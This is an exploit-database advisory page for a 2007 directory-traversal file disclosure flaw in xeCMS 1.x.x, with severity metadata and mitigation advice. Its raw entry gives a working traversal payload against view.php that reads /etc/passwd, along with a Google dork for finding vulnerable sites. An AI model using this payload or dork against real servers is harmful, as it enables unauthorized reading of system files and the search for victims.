header-logo
Suggest Exploit
vendor:
xeCMS
by:
p4imi0
7.5
CVSS
HIGH
Remote File Disclosure
22
CWE
Product Name: xeCMS
Affected Version From: 1.x.x
Affected Version To: 1.x.x
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:
2007

xeCMS 1.x.x Remote File Disclosure Vulnerability

This vulnerability allows an attacker to view arbitrary files on the server by exploiting the 'view.php' script. By manipulating the 'list' parameter, an attacker can traverse the directory structure and access sensitive files such as the '/etc/passwd' file.

Mitigation:

The vendor should release a patch to fix this vulnerability. In the meantime, restrict access to the 'view.php' script and sanitize user input to prevent directory traversal attacks.
Source

Exploit-DB raw data:

--------------------------------------------------------------
xeCMS 1.x.x Remote File Disclosure Vulnerability.
--------------------------------------------------------------

download    : http://xecms.sunsite.dk/
author      : p4imi0
contact     : p4imi0@gmail.com
exploit     : view.php?list=..%2F..%2F.. %2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd
google dork : inurl:"view.php?list=" Powered by xeCMS
thanks to   : str0ke, Cr[]w.

# milw0rm.com [2007-12-19]

Navigation

Suggest Exploit

Services By CQR